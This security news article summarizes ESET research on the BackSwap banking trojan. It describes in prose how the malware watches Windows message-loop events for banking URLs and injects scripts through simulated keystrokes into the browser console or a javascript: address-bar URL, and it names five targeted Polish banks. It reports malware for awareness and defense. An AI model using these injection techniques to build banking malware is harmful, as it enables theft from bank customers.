BackSwap Banking Trojan uses New Techniques Steal Money from your Account

ESET security researchers have spotted a new banking malware named BackSwap Trojan which can bypass antivirus software detection and security protection implemented in browsers.

BackSwap Trojan uses a never seen before techniques to steal money from customers instead of complex code injection methods.

“We have discovered a new banking malware family that uses an innovative technique to manipulate the browser: instead of using complex process injection methods to monitor browsing activity, the malware hooks key window message loop events in order to inspect values of the window objects for banking activity.”

Until now once the user access the bank account the malware injects malicious code into the web page by using the browser’s JavaScript console or directly into the address bar.

The BackSwap Trojan uses three new techniques which don’t tamper with the browser processes.

The first technique used to detect when the user is accessing a bank related website, the BackSwap uses windows mechanism named the ‘message loop’ which is an obligatory part of the code in every program which uses graphical interface in Microsoft Windows.

“The malware monitors the URL currently being visited by installing event hooks for a specific range of relevant events available through the Windows message loop, such as EVENT_OBJECT_FOCUS, EVENT_OBJECT_SELECTION, EVENT_OBJECT_NAMECHANGE and a few others. The hook will look for URL patterns by searching the objects for strings starting with “https” retrieved by calling the get_accValue method from the event’s IAccessible interface.” said in the report published by ESET

The malware looks into the Windows message loop for bank-specific URLs or any terms that are related to the banking website.

Once detected the malware uses one of the below techniques to load the malicious script to the corresponding bank from its resources.

In the first technique, the malware inserts the malicious script into the clipboard and simulates pressing the key combination for opening the developer’s console (CTRL+SHIFT+J in Google Chrome, CTRL+SHIFT+K in Mozilla Firefox).

After that, the malware simulates CTRL+V, which pastes the content of the clipboard and then sends ENTER to execute the contents of the console.

The malware then sends the console key combination again to close the console, and the browser window is made invisible during this process. As it takes only under a second to execute the entire attack user might find hard to find whether something went wrong.

In the second technique, instead of interacting with the developer’s console, the malicious script is directly executed from address bar via javascript protocols URL’s.

“The malware simply simulates pressing CTRL+L to select the address bar followed by the DELETE key to clear the field, then “types” in “javascript:” by calling SendMessageA in a loop, and then pastes the malicious script with the CTRL+V combination. It then executes the script by sending the ENTER key. At the end of the process, the address bar is cleared to remove any signs of compromise.”

The latest version of BackSwap malware supports the attack against Mozilla Firefox, Google Chrome, and Internet Explorer.

Researchers also said that the current version of BackSwap Trojan has the malicious script to target only five polish banks which are PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao.

 

Comments

Please rate this content

ASHIQUE SAJJAD

Ashique is a self motivated and passionate security analyst with a good knowledge in computer networking, security analysis, vulnerability assessment and penetration testing

You May Also Like